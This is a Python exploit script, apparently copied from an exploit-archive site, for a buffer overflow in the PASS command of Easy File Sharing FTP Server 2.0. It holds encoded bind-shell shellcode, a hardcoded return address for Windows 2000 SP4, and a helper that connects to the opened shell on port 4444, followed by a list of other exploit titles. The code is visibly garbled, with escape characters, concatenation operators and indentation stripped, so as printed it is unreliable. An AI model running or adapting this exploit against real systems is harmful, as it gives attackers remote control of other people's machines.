#!/usr/bin/python

# Remote exploit for Easy File Sharing FTP server V2.0. The vulnerability

# was discovered by h07 and a POC for windows XP SP2 (polish version) was

# provided. This exploit was tested on windows 2000 server SP4. The exploit

# binds a shell on TCP port 4444.

#

# Author shall bear no responsibility for any screw ups

# Winny Thomas :-)

import os

import sys

import time

import struct

import socket

shellcode = "xebx03x59xebx05xe8xf8xffxffxffx4fx49x49x49x49x49"

shellcode = "x49x51x5ax56x54x58x36x33x30x56x58x34x41x30x42x36"

shellcode = "x48x48x30x42x33x30x42x43x56x58x32x42x44x42x48x34"

shellcode = "x41x32x41x44x30x41x44x54x42x44x51x42x30x41x44x41"

shellcode = "x56x58x34x5ax38x42x44x4ax4fx4dx4ex4fx4cx56x4bx4e"

shellcode = "x4dx54x4ax4ex49x4fx4fx4fx4fx4fx4fx4fx42x46x4bx48"

shellcode = "x4ex56x46x42x46x42x4bx48x45x34x4ex33x4bx38x4ex37"

shellcode = "x45x50x4ax57x41x30x4fx4ex4bx38x4fx54x4ax31x4bx38"

shellcode = "x4fx45x42x32x41x30x4bx4ex49x34x4bx38x46x33x4bx38"

shellcode = "x41x30x50x4ex41x33x42x4cx49x59x4ex4ax46x58x42x4c"

shellcode = "x46x57x47x50x41x4cx4cx4cx4dx30x41x50x44x4cx4bx4e"

shellcode = "x46x4fx4bx43x46x35x46x32x4ax52x45x47x45x4ex4bx58"

shellcode = "x4fx45x46x42x41x50x4bx4ex48x56x4bx58x4ex30x4bx34"

shellcode = "x4bx38x4fx45x4ex51x41x50x4bx4ex43x30x4ex42x4bx48"

shellcode = "x49x38x4ex46x46x52x4ex31x41x36x43x4cx41x43x4bx4d"

shellcode = "x46x36x4bx48x43x34x42x53x4bx48x42x44x4ex50x4bx58"

shellcode = "x42x47x4ex31x4dx4ax4bx48x42x54x4ax30x50x55x4ax56"

shellcode = "x50x38x50x44x50x30x4ex4ex42x55x4fx4fx48x4dx48x36"

shellcode = "x43x35x48x36x4ax36x43x43x44x43x4ax36x47x37x43x57"

shellcode = "x44x53x4fx35x46x45x4fx4fx42x4dx4ax46x4bx4cx4dx4e"

shellcode = "x4ex4fx4bx43x42x45x4fx4fx48x4dx4fx45x49x48x45x4e"

shellcode = "x48x56x41x48x4dx4ex4ax30x44x30x45x55x4cx56x44x30"

shellcode = "x4fx4fx42x4dx4ax56x49x4dx49x50x45x4fx4dx4ax47x55"

shellcode = "x4fx4fx48x4dx43x45x43x45x43x45x43x35x43x35x43x44"

shellcode = "x43x55x43x44x43x35x4fx4fx42x4dx48x46x4ax56x41x31"

shellcode = "x4ex45x48x36x43x55x49x58x41x4ex45x39x4ax56x46x4a"

shellcode = "x4cx51x42x47x47x4cx47x45x4fx4fx48x4dx4cx46x42x31"

shellcode = "x41x35x45x55x4fx4fx42x4dx4ax36x46x4ax4dx4ax50x42"

shellcode = "x49x4ex47x45x4fx4fx48x4dx43x45x45x35x4fx4fx42x4d"

shellcode = "x4ax46x45x4ex49x44x48x58x49x54x47x45x4fx4fx48x4d"

shellcode = "x42x35x46x45x46x55x45x45x4fx4fx42x4dx43x59x4ax56"

shellcode = "x47x4ex49x37x48x4cx49x37x47x45x4fx4fx48x4dx45x55"

shellcode = "x4fx4fx42x4dx48x56x4cx46x46x46x48x46x4ax36x43x46"

shellcode = "x4dx46x49x58x45x4ex4cx46x42x35x49x35x49x32x4ex4c"

shellcode = "x49x38x47x4ex4cx36x46x34x49x38x44x4ex41x53x42x4c"

shellcode = "x43x4fx4cx4ax50x4fx44x44x4dx52x50x4fx44x44x4ex32"

shellcode = "x43x59x4dx38x4cx57x4ax33x4bx4ax4bx4ax4bx4ax4ax46"

shellcode = "x44x57x50x4fx43x4bx48x51x4fx4fx45x47x46x34x4fx4f"

shellcode = "x48x4dx4bx35x47x45x44x55x41x45x41x45x41x55x4cx36"

shellcode = "x41x30x41x35x41x45x45x45x41x45x4fx4fx42x4dx4ax46"

shellcode = "x4dx4ax49x4dx45x30x50x4cx43x55x4fx4fx48x4dx4cx46"

shellcode = "x4fx4fx4fx4fx47x43x4fx4fx42x4dx4bx48x47x55x4ex4f"

shellcode = "x43x58x46x4cx46x56x4fx4fx48x4dx44x45x4fx4fx42x4d"

shellcode = "x4ax56x4fx4ex50x4cx42x4ex42x36x43x55x4fx4fx48x4d"

shellcode = "x4fx4fx42x4dx5a"

def ConnectRemoteShell(target):

connect = "/usr/bin/telnet " target " 4444"

os.system(connect)

def ExploitFTP(target):

sockAddr = (target, 21)

tsock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

tsock.connect(sockAddr)

response = tsock.recv(1024)

print response

# At the time of overflow EBX points into our shellcode

payload = 'A' * 2553

# NOP's pad with a 15 byte jump over some junk and the RET address

# Jumps into our shellcode

payload = 'x90x90x90x90x90x90x90x90xebx0f'

# Address of 'call ebx' from kernel32.dll SP4

payload = struct.pack('<L', 0x7C577B03)

# Address of pop reg/pop reg/ret for XP SP2 from ws2_32.dll

# But this one is not very reliable like Win2K SP4

#payload = struct.pack('<L', 0x71AB1269)

payload = 'x90' * 83

payload = shellcode

user = 'USER anonymousrn'

tsock.send(user)

response = tsock.recv(1024)

print response

passwd = 'PASS x2c' payload 'rn'

tsock.send(passwd)

response = tsock.recv(1024)

print response

if __name__ == '__main__':

try:

target = sys.argv[1]

except IndexError:

print 'Usage: %s <target>' % sys.argv[0]

sys.exit(-1)

ExploitFTP(target)//http://www.leftworld.net

【Easy File Sharing FTP Server 2.0 (PASS) Remote Exploit】相关文章：

★ Ultra Office ActiveX Control Remote Buffer Overflow Exploit

★ Quicksilver Forums 1.4.1 forums[] Remote SQL Injection Exploit

★ Rianxosencabos CMS 0.9 Remote Add Admin Exploit

★ Easy Photo Gallery 2.1 XSS/FD/Bypass/SQL Injection Exploit

★ AlstraSoft Affiliate Network Pro (pgm) Remote SQL Injection Vulnerability

★ LoveCMS 1.6.2 Final Update Settings Remote Exploit

★ MojoClassifieds 2.0 Remote Blind SQL Injection Exploit

★ minb 0.1.0 Remote Code Execution Exploit

★ WebCMS Portal Edition (id) Remote SQL Injection Vulnerability

★ Debian Sarge Multiple IMAP Server Denial of Service Exploit